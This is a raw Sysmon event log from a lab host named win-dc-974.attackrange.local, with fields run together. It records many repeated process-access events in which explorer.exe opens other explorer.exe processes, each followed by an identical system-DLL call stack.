16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 